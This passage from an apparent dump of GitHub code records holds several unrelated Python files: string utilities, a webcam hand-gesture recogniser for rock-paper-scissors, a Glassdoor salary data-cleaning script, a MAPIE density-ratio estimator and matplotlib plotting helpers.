byte_size /= 1024.0\n#\n# return \"%.1f%s%s\" % (byte_size, 'Yi', suffix)\n\ndef byte_size_to_human_size(byte_size, do_round=True):\n if _verbose:\n print(f\"byte_size_to_human_size ( byte_size: {byte_size} , do_round: {do_round} )\")\n\n # 2**10 = 1024\n power = 2 ** 10\n n = 0\n power_labels = {0: \"\", 1: \"kilo\", 2: \"mega\", 3: \"giga\", 4: \"tera\"}\n\n while byte_size > power:\n byte_size /= power\n n += 1\n\n return (round(byte_size) if do_round else byte_size), power_labels[n] + \"bytes\"\n\n\n_verbose = False\nregex_manager = RegexManager()\nbefore_first_comma_pat = r\"^([^,])+\"\nafter_first_comma_and_space_pat = r\"(?<=\\, ).*\"\nonly_numbers_pat = r\"[^a-z ]\\ *([.0-9])*\\d\"\nnot_letters_pat = r\"[^a-zA-Z]\"\nnumber_groups_pat = r\"[0-9]+\"\nemail_validator_pat = r\"/\\b[\\w\\.-]+@[\\w\\.-]+\\.\\w{2,4}\\b/gi\"\n\n\ndef num_to_comma_str(num):\n if _verbose:\n print(f\"num_to_comma_str ( num: {num} )\")\n\n return \"{:,}\".format(num)\n\n\ndef strip_non_ascii(text):\n if type(text) is not str:\n return unidecode(str(text, encoding=\"utf-8\"))\n else:\n return text\n","repo_name":"QuantumCalzone/pythonutils","sub_path":"pythonutils/str_utils.py","file_name":"str_utils.py","file_ext":"py","file_size_in_byte":1818,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"29303156715","text":"import cv2\nimport mediapipe\nimport math\nimport csv\n\n\ndef distance(a, b):\n\n return math.sqrt(math.pow((b[0]-a[0]),2)+math.pow(b[1]-a[1],2))\n\n\ndef search_point(pts_list, cord, target):\n\n if cord == \"x\":\n for i in range(len(pts_list)):\n if pts_list[i][0] == target:\n return pts_list[i]\n elif cord == \"y\":\n for i in range(len(pts_list)):\n if pts_list[i][1] == target:\n return pts_list[i]\n else:\n return\n\n\ndef landmark_recognition():\n\n camera_id = 0\n\n capture = cv2.VideoCapture(camera_id)\n\n drawingModule = mediapipe.solutions.drawing_utils\n handsModule = mediapipe.solutions.hands\n\n frameWidth = capture.get(cv2.CAP_PROP_FRAME_WIDTH)\n frameHeight = capture.get(cv2.CAP_PROP_FRAME_HEIGHT)\n\n\n result = \"\"\n\n with handsModule.Hands(static_image_mode=False, min_detection_confidence=0.7, min_tracking_confidence=0.7, max_num_hands=1) as hands:\n \n while True:\n \n ret, frame = capture.read()\n \n results = hands.process(cv2.cvtColor(frame, cv2.COLOR_BGR2RGB))\n \n if results.multi_hand_landmarks != None:\n\n for handLandmarks in results.multi_hand_landmarks:\n\n # Wrist (O)\n wrist = 0\n wrist_normalizedLandmark = handLandmarks.landmark[wrist]\n wrist_pixelCoordinatesLandmark = drawingModule._normalized_to_pixel_coordinates(wrist_normalizedLandmark.x, wrist_normalizedLandmark.y, frameWidth, frameHeight)\n\n # cv2.circle(frame, wrist_pixelCoordinatesLandmark, 5, (255, 255, 0), -1)\n\n # Thumb tip (A)\n thumbtip = 4\n thumbtip_normalizedLandmark = handLandmarks.landmark[thumbtip]\n thumbtip_pixelCoordinatesLandmark = drawingModule._normalized_to_pixel_coordinates(thumbtip_normalizedLandmark.x, thumbtip_normalizedLandmark.y, frameWidth, frameHeight)\n\n # cv2.circle(frame, thumbtip_pixelCoordinatesLandmark, 5, (0, 255, 0), -1)\n\n # Index finger tip (B)\n index_fingertip = 8\n index_fingertip_normalizedLandmark = handLandmarks.landmark[index_fingertip]\n index_fingertip_pixelCoordinatesLandmark = drawingModule._normalized_to_pixel_coordinates(index_fingertip_normalizedLandmark.x, index_fingertip_normalizedLandmark.y, frameWidth, frameHeight)\n\n # cv2.circle(frame, index_fingertip_pixelCoordinatesLandmark, 5, (0, 
255, 0), -1)\n\n # Middle finger tip (C)\n mid_fingertip = 12\n mid_fingertip_normalizedLandmark = handLandmarks.landmark[mid_fingertip]\n mid_fingertip_pixelCoordinatesLandmark = drawingModule._normalized_to_pixel_coordinates(mid_fingertip_normalizedLandmark.x, mid_fingertip_normalizedLandmark.y, frameWidth, frameHeight)\n\n # cv2.circle(frame, mid_fingertip_pixelCoordinatesLandmark, 5, (0, 255, 0), -1)\n\n # Ring finger tip (D)\n ring_fingertip = 16\n ring_fingertip_normalizedLandmark = handLandmarks.landmark[ring_fingertip]\n ring_fingertip_pixelCoordinatesLandmark = drawingModule._normalized_to_pixel_coordinates(ring_fingertip_normalizedLandmark.x, ring_fingertip_normalizedLandmark.y, frameWidth, frameHeight)\n\n # cv2.circle(frame, ring_fingertip_pixelCoordinatesLandmark, 5, (0, 255, 0), -1)\n\n # Pinky tip (E)\n pinkytip = 20\n pinkytip_normalizedLandmark = handLandmarks.landmark[pinkytip]\n pinkytip_pixelCoordinatesLandmark = drawingModule._normalized_to_pixel_coordinates(pinkytip_normalizedLandmark.x, pinkytip_normalizedLandmark.y, frameWidth, frameHeight)\n\n # cv2.circle(frame, pinkytip_pixelCoordinatesLandmark, 5, (0, 255, 0), -1)\n\n # cv2.line(frame, wrist_pixelCoordinatesLandmark, thumbtip_pixelCoordinatesLandmark, (255, 102, 255), 2)\n # cv2.line(frame, wrist_pixelCoordinatesLandmark, index_fingertip_pixelCoordinatesLandmark, (255, 102, 255), 2)\n # cv2.line(frame, wrist_pixelCoordinatesLandmark, mid_fingertip_pixelCoordinatesLandmark, (255, 102, 255), 2)\n # cv2.line(frame, wrist_pixelCoordinatesLandmark, ring_fingertip_pixelCoordinatesLandmark, (255, 102, 255), 2)\n # cv2.line(frame, wrist_pixelCoordinatesLandmark, pinkytip_pixelCoordinatesLandmark, (255, 102, 255), 2)\n\n if wrist_pixelCoordinatesLandmark and index_fingertip_pixelCoordinatesLandmark and mid_fingertip_pixelCoordinatesLandmark and ring_fingertip_pixelCoordinatesLandmark and pinkytip_pixelCoordinatesLandmark:\n\n dist_OA = distance(a=wrist_pixelCoordinatesLandmark, b=thumbtip_pixelCoordinatesLandmark)\n dist_OB = distance(a=wrist_pixelCoordinatesLandmark, b=index_fingertip_pixelCoordinatesLandmark)\n dist_OC = distance(a=wrist_pixelCoordinatesLandmark, b=mid_fingertip_pixelCoordinatesLandmark)\n dist_OD = distance(a=wrist_pixelCoordinatesLandmark, b=ring_fingertip_pixelCoordinatesLandmark)\n dist_OE = distance(a=wrist_pixelCoordinatesLandmark, b=pinkytip_pixelCoordinatesLandmark)\n\n # print(\"Distance OA: {}\".format(dist_OA))\n # print(\"Distance OB: {}\".format(dist_OB))\n # print(\"Distance OC: {}\".format(dist_OC))\n # print(\"Distance OD: {}\".format(dist_OD))\n # print(\"Distance OE: {}\".format(dist_OE))\n\n right_most = max([wrist_pixelCoordinatesLandmark[0], thumbtip_pixelCoordinatesLandmark[0], index_fingertip_pixelCoordinatesLandmark[0], mid_fingertip_pixelCoordinatesLandmark[0], ring_fingertip_pixelCoordinatesLandmark[0], pinkytip_pixelCoordinatesLandmark[0]])\n left_most = min([wrist_pixelCoordinatesLandmark[0], thumbtip_pixelCoordinatesLandmark[0], index_fingertip_pixelCoordinatesLandmark[0], mid_fingertip_pixelCoordinatesLandmark[0], ring_fingertip_pixelCoordinatesLandmark[0], pinkytip_pixelCoordinatesLandmark[0]])\n upper_most = min([wrist_pixelCoordinatesLandmark[1], thumbtip_pixelCoordinatesLandmark[1], index_fingertip_pixelCoordinatesLandmark[1], mid_fingertip_pixelCoordinatesLandmark[1], ring_fingertip_pixelCoordinatesLandmark[1], pinkytip_pixelCoordinatesLandmark[1]])\n lower_most = max([wrist_pixelCoordinatesLandmark[1], thumbtip_pixelCoordinatesLandmark[1], 
index_fingertip_pixelCoordinatesLandmark[1], mid_fingertip_pixelCoordinatesLandmark[1], ring_fingertip_pixelCoordinatesLandmark[1], pinkytip_pixelCoordinatesLandmark[1]])\n \n up_join_pt = search_point(pts_list=[wrist_pixelCoordinatesLandmark, thumbtip_pixelCoordinatesLandmark, index_fingertip_pixelCoordinatesLandmark, mid_fingertip_pixelCoordinatesLandmark, ring_fingertip_pixelCoordinatesLandmark, pinkytip_pixelCoordinatesLandmark], cord=\"y\", target=upper_most)\n left_join_pt = search_point(pts_list=[wrist_pixelCoordinatesLandmark, thumbtip_pixelCoordinatesLandmark, index_fingertip_pixelCoordinatesLandmark, mid_fingertip_pixelCoordinatesLandmark, ring_fingertip_pixelCoordinatesLandmark, pinkytip_pixelCoordinatesLandmark], cord=\"x\", target=left_most)\n low_join_pt = search_point(pts_list=[wrist_pixelCoordinatesLandmark, thumbtip_pixelCoordinatesLandmark, index_fingertip_pixelCoordinatesLandmark, mid_fingertip_pixelCoordinatesLandmark, ring_fingertip_pixelCoordinatesLandmark, pinkytip_pixelCoordinatesLandmark], cord=\"y\", target=lower_most)\n right_join_pt = search_point(pts_list=[wrist_pixelCoordinatesLandmark, thumbtip_pixelCoordinatesLandmark, index_fingertip_pixelCoordinatesLandmark, mid_fingertip_pixelCoordinatesLandmark, ring_fingertip_pixelCoordinatesLandmark, pinkytip_pixelCoordinatesLandmark], cord=\"x\", target=right_most)\n\n up_join_dist = distance(a=up_join_pt, b=left_join_pt)\n low_join_dist = distance(a=right_join_pt, b=low_join_pt)\n\n top_left_corner = (int(up_join_pt[0]-up_join_dist-50), up_join_pt[1]-50)\n bottom_right_corner = (int(low_join_pt[0]+low_join_dist+30), low_join_pt[1]+50)\n\n # cv2.rectangle(frame, top_left_corner, bottom_right_corner, (255,0,0), thickness=2)\n\n if dist_OA <= 170 and dist_OB >= 230 and dist_OC >= 230 and dist_OD <= 170 and dist_OE <= 130:\n \n result = \"Scissor\"\n\n img = frame[top_left_corner[1]:bottom_right_corner[1], top_left_corner[0]:bottom_right_corner[0]]\n cv2.imwrite('images/user_result.jpg', img)\n\n # print(result)\n\n return result\n \n elif dist_OA <= 165 and dist_OB <= 148 and dist_OC <= 138 and dist_OD <= 132 and dist_OE <= 115:\n\n result = \"Rock\"\n\n img = frame[top_left_corner[1]:bottom_right_corner[1], top_left_corner[0]:bottom_right_corner[0]]\n cv2.imwrite('images/user_result.jpg', img)\n\n # print(result)\n\n return result\n\n elif dist_OA >= 110 and dist_OB >= 170 and dist_OC >= 170 and dist_OD >= 145 and dist_OE >= 100:\n\n result = \"Paper\"\n\n img = frame[top_left_corner[1]:bottom_right_corner[1], top_left_corner[0]:bottom_right_corner[0]]\n cv2.imwrite('images/user_result.jpg', img)\n\n # print(result)\n\n return result\n\n# data = [dist_OA,dist_OB,dist_OC,dist_OD,dist_OE]\n\n# with open('tracking-scissors.csv', 'a', encoding='UTF8') as f:\n# writer = csv.writer(f) \n# writer.writerow(data)\n \n# cv2.imshow('Rock, Paper, Scissors!', frame)\n\n \n# if cv2.waitKey(1) == 27:\n# break\n \n# cv2.destroyAllWindows()\n# capture.release()\n\n# landmark_recognition()","repo_name":"thieulong/Rock-Paper-Scissors","sub_path":"recognition.py","file_name":"recognition.py","file_ext":"py","file_size_in_byte":10569,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"19233206282","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Oct 20 14:06:07 2020\n\n@author: RussellP\n\"\"\"\nimport pandas as pd\n \ndf = pd.read_csv('glassdoor_jobs.csv')\n\n# Salary Parsing\n\n# Remove rating from Comapny Name Field\n\n# Parse state and city into 2 different columns 
(variables)\n\n# Change the founded variable to age of company\n\n# Parsing of Job Description (Python, Years Exp)\n\n\n# SALARY PARSING\n# Remove any values that do not have a valid salary (They are currently set -1)\ndf = df[df['Salary Estimate'] != '-1']\n\n# Removing 'Glassdor Est.' text from Salary Estimate fields\nsalary = df['Salary Estimate'].apply(lambda x: x.split('(')[0])\n\n# Removing the 'k' and '$' from the Salary Estimate range\nremoved_k = salary.apply(lambda x: x.replace('k', '').replace('$', ''))\n\n# Create Column for Per Hour and Employer Provided Salary in the case there is per hour or employer provided salaries\ndf['Hourly'] = df['Salary Estimate'].apply(lambda x: 1 if 'per hour' in x.lower() else 0) # use this type of method to parse out per hour also)\n\n# Get the min salary for the salary estimate range and convert to int\ndf['min_salary'] = removed_k.apply(lambda x: int(x.split('-')[0]))\n\n# Get the max salary for the salary estimate range and convert to int\ndf['max_salary'] = removed_k.apply(lambda x: int(x.split('-')[1]))\n\n# Get the average of the min and max salary\ndf['avg_salary'] = (df.min_salary + df.max_salary)/2\n\n# COMPANY NAME PARSING\n# Remove the rating\ndf['company_txt'] = df.apply(lambda x: x['Company Name'] if x['Rating'] < 0 else x['Company Name'][:-3], axis = 1)\n\n# LOCATION PARSING\n# Creating state field\ndf['job_state'] = df['Location'].apply(lambda x: x.split(',')[1])\n\n# Check if the job is in the same place as the HQ (NOTE: The scraper currently doesn't pull in the headquarters values, will fix soon)\ndf['same_state'] = df.apply(lambda x: 1 if x.Location == x.Headquarters else 0, axis = 1)\n\n\n# Check how many jobs are in each state (Note: our data is currently only from San Francisco)\n# df.job_state.value_counts()\n\n# FOUNDED PARSING\n# Changing it to age of company\ndf['age'] = df['Founded'].apply(lambda x: x if x < 1 else 2020 - x)\n\n# JOB DESCRIPTION PARSING\n# Python\ndf['python'] = df['Job Description'].apply(lambda x: 1 if 'python' in x.lower() else 0)\n\n# SQL\ndf['sql'] = df['Job Description'].apply(lambda x: 1 if 'sql' in x.lower() else 0)\n\n# Excel\ndf['excel'] = df['Job Description'].apply(lambda x: 1 if 'excel' in x.lower() else 0)\n\n# Apache Spark\ndf['spark'] = df['Job Description'].apply(lambda x: 1 if 'spark' in x.lower() else 0)\n\n# AWS\ndf['aws'] = df['Job Description'].apply(lambda x: 1 if 'aws' in x.lower() else 0)\n\n# 2 Years of experience (This parsing will be improved next iteration)\ndf['experience_2years'] = df['Job Description'].apply(lambda x: 1 if '2 years' in x.lower() else 0)\n\ndf.to_csv('salary_data_cleaned.csv', index = False)\n\npd.read_csv('salary_data_cleaned.csv')\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"russell94paul/salary_estimator_project","sub_path":"data_cleaning.py","file_name":"data_cleaning.py","file_ext":"py","file_size_in_byte":2917,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"9515301430","text":"from __future__ import annotations\r\n\r\nfrom typing import Optional\r\nimport numpy as np\r\nfrom sklearn.base import ClassifierMixin\r\nfrom sklearn.linear_model import LogisticRegression\r\nfrom sklearn.pipeline import Pipeline\r\nfrom sklearn.utils.validation import check_is_fitted\r\nfrom mapie._typing import ArrayLike\r\n\r\n\r\nclass DensityRatioEstimator():\r\n \"\"\" Template class for density ratio estimation. 
\"\"\"\r\n\r\n def __init__(self) -> None:\r\n raise NotImplementedError\r\n\r\n def fit(self) -> None:\r\n raise NotImplementedError\r\n\r\n def predict(self) -> None:\r\n raise NotImplementedError\r\n\r\n def check_is_fitted(self) -> None:\r\n raise NotImplementedError\r\n\r\n\r\nclass ProbClassificationDRE(DensityRatioEstimator):\r\n \"\"\"\r\n Density ratio estimation by classification.\r\n\r\n This class implements the density ratio estimation by classification\r\n strategy. The broad idea is to first learn a discriminative classifier to\r\n distinguish between source and target datasets, and then use the class\r\n probability estimates from the classifier to estimate the density ratio.\r\n\r\n Parameters\r\n ----------\r\n estimator: Optional[ClassifierMixin]\r\n Any classifier with scikit-learn API (i.e. with fit, predict, and\r\n predict_proba methods), by default ``None``.\r\n If ``None``, estimator defaults to a ``LogisticRegression`` instance.\r\n\r\n clip_min: Optional[float]\r\n Lower bound the probability estimate from the classifier to\r\n ``clip_min``. If ``None``, the estimates are not lower bounded.\r\n\r\n By default ``None``.\r\n\r\n clip_max: Optional[float]\r\n Upper bound the probability estimate from the classifier to\r\n ``clip_max``. If ``None``, the estimates are not upper bounded.\r\n\r\n By default ``None``.\r\n\r\n Attributes\r\n ----------\r\n source_prob: float\r\n The marginal probability of getting a datapoint from the source\r\n distribution.\r\n\r\n target_prob: float\r\n The marginal probability of getting a datapoint from the target\r\n distribution.\r\n\r\n References\r\n ----------\r\n\r\n Examples\r\n --------\r\n\r\n \"\"\"\r\n\r\n def __init__(\r\n self,\r\n estimator: Optional[ClassifierMixin] = None,\r\n clip_min: Optional[float] = None,\r\n clip_max: Optional[float] = None,\r\n ) -> None:\r\n\r\n self.estimator = self._check_estimator(estimator)\r\n\r\n if clip_max is None:\r\n self.clip_max = 1\r\n elif all((clip_max >= 0, clip_max <= 1)):\r\n self.clip_max = clip_max\r\n else:\r\n raise ValueError(\"Expected `clip_max` to be between 0 and 1.\")\r\n\r\n if clip_min is None:\r\n self.clip_min = 0\r\n elif all((clip_min >= 0, clip_min <= clip_max)):\r\n self.clip_min = clip_min\r\n else:\r\n raise ValueError(\r\n \"Expected `clip_min` to be between 0 and `clip_max`.\")\r\n\r\n def _check_estimator(\r\n self,\r\n estimator: Optional[ClassifierMixin] = None,\r\n ) -> ClassifierMixin:\r\n \"\"\"\r\n Check if estimator is ``None``,\r\n and returns a ``LogisticRegression`` instance if necessary.\r\n\r\n Parameters\r\n ----------\r\n estimator : Optional[ClassifierMixin], optional\r\n Estimator to check, by default ``None``\r\n\r\n Returns\r\n -------\r\n ClassifierMixin\r\n The estimator itself or a default ``LogisticRegression`` instance.\r\n\r\n Raises\r\n ------\r\n ValueError\r\n If the estimator is not ``None``\r\n and has no fit, predict, nor predict_proba methods.\r\n \"\"\"\r\n if estimator is None:\r\n return LogisticRegression(class_weight=\"balanced\", random_state=0)\r\n\r\n if isinstance(estimator, Pipeline):\r\n est = estimator[-1]\r\n else:\r\n est = estimator\r\n if (\r\n not hasattr(est, \"fit\")\r\n and not hasattr(est, \"predict\")\r\n and not hasattr(est, \"predict_proba\")\r\n ):\r\n raise ValueError(\r\n \"Invalid estimator. 
\"\r\n \"Please provide a classifier with fit,\"\r\n \"predict, and predict_proba methods.\"\r\n )\r\n\r\n return estimator\r\n\r\n def fit(\r\n self,\r\n X_source: ArrayLike,\r\n X_target: ArrayLike,\r\n source_prob: Optional[float] = None,\r\n target_prob: Optional[float] = None,\r\n sample_weight: Optional[ArrayLike] = None\r\n ) -> ProbClassificationDRE:\r\n \"\"\"\r\n Fit the discriminative classifier to source and target samples.\r\n\r\n Parameters\r\n ----------\r\n X_source: ArrayLike of shape (n_source_samples, n_features)\r\n Training data.\r\n\r\n X_target: ArrayLike of shape (n_target_samples, n_features)\r\n Training data.\r\n\r\n source_prob: Optional[float]\r\n The marginal probability of getting a datapoint from the source\r\n distribution. If ``None``, the proportion of source examples in\r\n the training dataset is used.\r\n\r\n By default ``None``.\r\n\r\n target_prob: Optional[float]\r\n The marginal probability of getting a datapoint from the target\r\n distribution. If ``None``, the proportion of target examples in\r\n the training dataset is used.\r\n\r\n By default ``None``.\r\n\r\n sample_weight : Optional[ArrayLike] of shape (n_source + n_target,)\r\n Sample weights for fitting the out-of-fold models.\r\n If ``None``, then samples are equally weighted.\r\n If some weights are null,\r\n their corresponding observations are removed\r\n before the fitting process and hence have no prediction sets.\r\n\r\n By default ``None``.\r\n\r\n Returns\r\n -------\r\n ProbClassificationDRE\r\n The density ratio estimator itself.\r\n \"\"\"\r\n\r\n # Find the marginal source and target probability.\r\n n_source = X_source.shape[0]\r\n n_target = X_target.shape[0]\r\n\r\n if source_prob is None:\r\n source_prob = n_source/(n_source + n_target)\r\n\r\n if target_prob is None:\r\n target_prob = n_target/(n_source + n_target)\r\n\r\n if source_prob + target_prob != 1:\r\n raise ValueError(\r\n \"``source_prob`` and ``target_prob`` do not add up to 1.\")\r\n\r\n self.source_prob = source_prob\r\n self.target_prob = target_prob\r\n\r\n # Estimate the conditional probability of source/target given X.\r\n X = np.concatenate((X_source, X_target), axis=0)\r\n y = np.concatenate((np.zeros(n_source), np.ones(n_target)), axis=0)\r\n\r\n if type(self.estimator) == Pipeline:\r\n step_name = self.estimator.steps[-1][0]\r\n self.estimator.fit(\r\n X, y, **{f'{step_name}__sample_weight': sample_weight})\r\n else:\r\n self.estimator.fit(X, y, sample_weight=sample_weight)\r\n\r\n return self\r\n\r\n def predict(\r\n self,\r\n X: ArrayLike,\r\n ) -> ArrayLike:\r\n \"\"\"\r\n Predict the density ratio estimates for new samples.\r\n\r\n Parameters\r\n ----------\r\n X: ArrayLike of shape (n_samples, n_features)\r\n Samples to get the density ratio estimates for.\r\n\r\n Returns\r\n -------\r\n ProbClassificationDRE\r\n The density ratio estimtor itself.\r\n \"\"\"\r\n\r\n # Some models in sklearn have predict_proba but not predict_log_proba.\r\n if not hasattr(self.estimator, \"predict_log_proba\"):\r\n probs = self.estimator.predict_proba(X)\r\n log_probs = np.log(probs)\r\n else:\r\n log_probs = self.estimator.predict_log_proba(X)\r\n\r\n # Clip prob to mitigate extremely high or low dre.\r\n log_probs = np.clip(log_probs, a_min=np.log(\r\n self.clip_min), a_max=np.log(self.clip_max))\r\n\r\n return np.exp(log_probs[:, 1] - log_probs[:, 0] +\r\n np.log(self.source_prob) - np.log(self.target_prob))\r\n\r\n def check_is_fitted(self) -> None:\r\n if isinstance(self.estimator, Pipeline):\r\n 
check_is_fitted(self.estimator[-1])\r\n else:\r\n check_is_fitted(self.estimator)\r\n\r\n\r\ndef calculate_ess(weights: ArrayLike) -> float:\r\n \"\"\"\r\n Calculates the effective sample size given importance weights for the\r\n source distribution.\r\n\r\n Parameters\r\n ----------\r\n weights: ArrayLike\r\n Importance weights for the examples in source distribution.\r\n \"\"\"\r\n num = weights.sum()**2\r\n denom = (weights**2).sum()\r\n return num/denom","repo_name":"nilslacroix/MAPIE","sub_path":"mapie/dre.py","file_name":"dre.py","file_ext":"py","file_size_in_byte":8674,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"73691326985","text":"\"\"\"\nCreated on Tue Oct 24 15:51:47 2017\n\n@author: jsuter\n\nProject: Language Level Analysis and Classification\nSeminar \"Educational Assessment for Language Technology\" \nWS 2015/16, Magdalena Wolska\n\nJulia Suter, January 2019\n\n-----------------------------------------------------------------\n\ndata_visualization.py\n\n- save matplotlib figures\n- plot confusion matrix\n- plot feature coefficients\n- plot cluster components\n- plot PCA\n- set up feature set/n_cluster widgets\n\"\"\"\n\n\n# Import Statements\nimport os\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport sklearn\n\nfrom ipywidgets import Select, IntSlider, Layout\nfrom IPython.display import display\n\n\n\ndef save_fig(fig_name, tight_layout=True, fig_extension=\"png\", resolution=300):\n\t\"\"\"Save current matplotlib plot as image with given file name.\n\t\n\tParameters:\n\n\t\tfig_name (string): figure name\n\t\n\tKeyword arguments:\n\n\t\ttight_layout (Boolean) -- set a tight layout for the figure (default = True)\n\t\tfig_extension (string) -- file format, e.g. 
\"jpeg\" will make the file end in .jpeg, default = \"png\"\n\t\tsolution (int) -- resolution of saved figure (default = 300)\n\n\tReturn: None\"\"\"\n\t\n\t# Set the file path \n\tpath = os.path.join(\"./figures/\", fig_name + \".\" + fig_extension)\n\n\t# Get tight layout if necessary\n\tif tight_layout:\n\t\tplt.tight_layout()\n\t\t\n\t# Save the figure in the right format and resolution\n\tplt.savefig(path, format=fig_extension, dpi=resolution)\n\n\ndef plot_confusion_matrix(solutions, predictions, label_set, title):\t\n\t\"\"\"Plot the confusion matrix for different classes given correct labels and predictions.\n\t\n\tParamters:\n\t\n\t\tsolutions (np.array) -- correct labels\n\t\tpredictions (np.array) -- predicted labels\n\t\tlabel_set (list) -- labels/classes to predict\n\t\ttitle (string) -- plot title displayed above plot\n\n\tReturn: None\"\"\"\n\t\n\t# Compute confusion matrix\n\tcm = sklearn.metrics.confusion_matrix(solutions, predictions, labels=range(len(label_set)))\n\t\n\t# Set figure size\n\tif len(label_set)>5:\n\t\tplt.figure(figsize=(10,10))\n\telse:\n\t\tplt.figure(figsize=(5,5))\n\n\t# Plot confusion matrix with blue color map\n\tplt.imshow(cm, interpolation='none',cmap='Blues')\n\n\t# Write out the number of instances per cell\n\tfor (i,j), z in np.ndenumerate(cm):\n\t\tplt.text(j, i, z, ha='center', va='center')\n\t\t\n\t# Assign labels and title\n\tplt.xlabel(\"Prediction\")\n\tplt.ylabel(\"Ground truth\")\n\tplt.title(title)\n\n\t# Set x ticks and labels\n\tplt.gca().set_xticks(range(len(label_set)))\n\tplt.gca().set_xticklabels(label_set, rotation=50)\n\n\t# Set y ticks and labels\n\tplt.gca().set_yticks(range(len(label_set)))\n\tplt.gca().set_yticklabels(label_set)\n\tplt.gca().invert_yaxis()\n\t\n\t# Show plot\n\tplt.show()\n\t\n\ndef plot_feature_coefficients(classifier, feature_names, label_set):\n\t\"\"\"Plot the feature coefficients for each label given an SVM classifier. 
\n\t\n\tParamters:\n\t\t\n\t\tclassifier (sklearn.svm._classes.LinearSVC) -- linear SVM classifier (has to be fitted!)\n\t\tfeature_names (list) -- feature names as list of strings\n\t\tlabel_set (list) -- label set as a list of strings\n\n\tReturn: None\n\t\"\"\"\n\t\n\t# Layout settings depending un number of labels\n\tif len(label_set)>4:\n\t\tFIGSIZE = (80,30)\n\t\tROTATION = 35\n\t\tRIGHT = 0.81\n\telse:\n\t\tFIGSIZE = (40,12)\n\t\tROTATION = 45\n\t\tRIGHT = 0.58\n\n\t# Sort the feature indices according coefficients (highest coefficient first)\n\tsort_idx = np.argsort(-abs(classifier.coef_).max(axis=0))\n\n\t# Get sorted coefficients and feature names\n\tsorted_coef = classifier.coef_[:,sort_idx]\n\tsorted_fnames = feature_names[sort_idx]\n\n\t# Make subplots\n\tx_fig, x_axis = plt.subplots(2,1,figsize=FIGSIZE)\n\n\t# Plot coefficients on two different lines\n\tim_0 = x_axis[0].imshow(sorted_coef[:,:sorted_coef.shape[1]//2], interpolation='none', cmap='seismic',vmin=-2.5, vmax=2.5)\n\tim_1 = x_axis[1].imshow(sorted_coef[:,sorted_coef.shape[1]//2:], interpolation='none', cmap='seismic',vmin=-2.5, vmax=2.5)\n\n\t# Set y ticks (number of classes)\n\tx_axis[0].set_yticks(range(len(label_set)))\n\tx_axis[1].set_yticks(range(len(label_set)))\n\n\t# Set the y labels (classes/labels)\n\tx_axis[0].set_yticklabels(label_set, fontsize=24)\n\tx_axis[1].set_yticklabels(label_set, fontsize=24)\n\n\t# Set x ticks (half the number of features) and labels\n\tx_axis[0].set_xticks(range(len(feature_names)//2))\n\tx_axis[1].set_xticks(range(len(feature_names)//2))\n\n\t# Set the x labels (feature names)\n\tx_axis[0].set_xticklabels(sorted_fnames[:len(feature_names)//2], rotation=ROTATION, ha='right', fontsize=20)\n\tx_axis[1].set_xticklabels(sorted_fnames[len(feature_names)//2:], rotation=ROTATION, ha='right', fontsize=20)\n\n\t# Move plot to the right\n\tx_fig.subplots_adjust(right=RIGHT)\n\n\t# Set color bar\n\tcbar_ax = x_fig.add_axes([0.605, 0.15, 0.02, 0.7])\n\tcbar = x_fig.colorbar(im_0, cax=cbar_ax)\n\tcbar.ax.tick_params(labelsize=24) \n\t\n\t# Show\n\tplt.show()\n\n\n\ndef plot_cluster_components(clusters, names):\n\t\"\"\"Visualize cluster components.\n\t\n\tParameters:\n\n\t\tclusters (np.array) -- array representing to which cluster each feature belongs\n\t\tnames (list) -- cluster components as list of strings\n\n\tReturn: None\n\t\"\"\"\n\n\t# Initialize figure\n\tfig = plt.figure(figsize=(20, 0.5))\n\n\t# Plot lines of appropriate length\n\tcluster_sizes = np.bincount(clusters)\n\t\n\t# Set color list\n\tcolors = [\"b\",\"g\",\"r\",\"c\",\"m\"]*100\t\n\tcolors = colors[:len(cluster_sizes)]\n\t\n\t# Transform names into list\n\tnames = names.tolist()\n\n\t# Plot a bar representing number of components for each cluster\n\tpos = 0.0\n\tfor clust_size, color in zip(cluster_sizes, colors):\n\t\tplt.plot([pos-0.9, pos+clust_size-1+0.1], [0, 0], lw=7, c=color)\n\t\tpos += clust_size+1\n\n\t\t# Add feature names\n\t\tnames.insert(int(pos-1),\"\")\n\n\t# Get axis\n\tax = fig.gca()\n\n\t# Remove all the frame stuff\n\tax.set_frame_on(False)\n\tax.xaxis.set_ticks_position('none') \n\tax.yaxis.set_visible(False)\n\t\n\t# Set the labels\n\tax.set_xticks(range(len(names)))\n\tax.xaxis.set_ticklabels(names, rotation=55, ha=\"right\", fontsize=11)\n\t\n\t# Set limitation of frame\n\tax.set_xlim((-0.9, pos+clust_size-1+0.1))\n\n\t# Show\n\tplt.show()\n\t\n\t\ndef plot_PCA(pca, transformed_data, features, solutions):\n\t\"\"\"Plot Principal Component Analysis.\n\t\n\tParameters:\n\n\t\tpca 
(sklearn._pca.PCA) -- PCA for features\n\t\ttransformed_data (np.array) -- PCA-transformed data\n\t\tfeatures (np.array) -- feature array\n\t\tsolutions (np.array) -- solution/label array \n\n\tReturn: None\"\"\"\n\n\t# Get first and second principal components\n\tfirst_pc = pca.components_[0]\n\tsecond_pc = pca.components_[1]\n\t\n\t# Axis of pc1, pc2\n\tfor i,j in zip(transformed_data, features):\n\t\tplt.scatter(first_pc[0]*i[0], first_pc[1]*i[0], color='r')\n\t\tplt.scatter(second_pc[0]*i[1], second_pc[1]*i[1], color='c')\n\t\tplt.scatter(j[0],j[1], color='b')\n\t\t\n\t# Plot\n\t#plt.show()\n\n\t# Prinicipal component space (pc1, pc2)\n\ttarget_colors = {0:'blue', 1:'green', 2:'orange', 3:'red'}\n\tplt.scatter(transformed_data[:,0],transformed_data[:,1], \n\t\t\t\tc=[target_colors[key] for key in solutions],\n\t\t\t\talpha=0.5, edgecolor='none')\n\n\t# Assign labels and title\n\tplt.xlabel(\"PC 1\")\n\tplt.ylabel(\"PC 2\")\n\tplt.title(\"PCA transformed data space\")\n\n\tplt.show()\n\n\n\t# Explained variance ratio (how much is covered by how many components)\n\n\t# Per 